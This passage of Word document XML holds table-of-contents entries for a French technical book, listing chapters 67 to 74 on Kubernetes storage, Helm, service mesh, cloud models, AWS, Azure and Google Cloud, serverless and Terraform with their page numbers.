          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>67.4 Réseau et DNS interne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>598</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>67.5 Diagnostiquer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>598</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>68. Stockage et applications à état</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>603</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>68.1 Un pod est remplaçable, une donnée ne l'est pas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>603</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>68.2 PV, PVC et classes de stockage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>603</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>68.3 StatefulSet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>605</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>68.4 Sauvegarder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>606</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>68.5 Cas des applications à état</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>606</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Partie IV — Cloud, provisionnement et configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>69. Helm et service mesh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>611</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>69.1 Pourquoi un gestionnaire de paquets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>612</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>69.2 Paramétrer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>613</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>69.3 Installer, mettre à jour, revenir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>614</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>69.4 Service mesh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>615</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>69.5 Faut-il un mesh ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>616</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>70. Modèles de cloud et architecture de référence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>621</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>70.1 Quatre modèles de service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>621</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>70.2 Concevoir pour la panne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>622</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>70.3 Modèles de coût</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>623</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>70.4 Un fournisseur ou plusieurs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>624</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>71. AWS : services essentiels et bonnes pratiques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>628</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>71.1 IAM : identités et permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>628</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>71.2 VPC : un réseau isolé</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>629</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>71.3 Calcul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>630</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>71.4 Stockage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>631</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>71.5 Supervision</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>631</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>72. Azure et Google Cloud : équivalents et choix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>636</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>72.1 Les concepts se ressemblent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>636</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>72.2 Identité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>637</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>72.3 Calcul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>638</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>72.4 Réseau</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>638</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>72.5 Choisir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>639</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>73. Serverless : fonctions et événements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>643</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>73.1 Le modèle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>643</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>73.2 Écrire une fonction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>644</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>73.3 Mémoire, délai et concurrence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>645</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>73.4 Concevoir une chaîne d'événements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>646</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>73.5 Coût et pièges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>647</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>74. Terraform : décrire l'infrastructure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>652</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>74.1 Le cycle en trois temps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>652</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>74.2 L'état</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>653</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
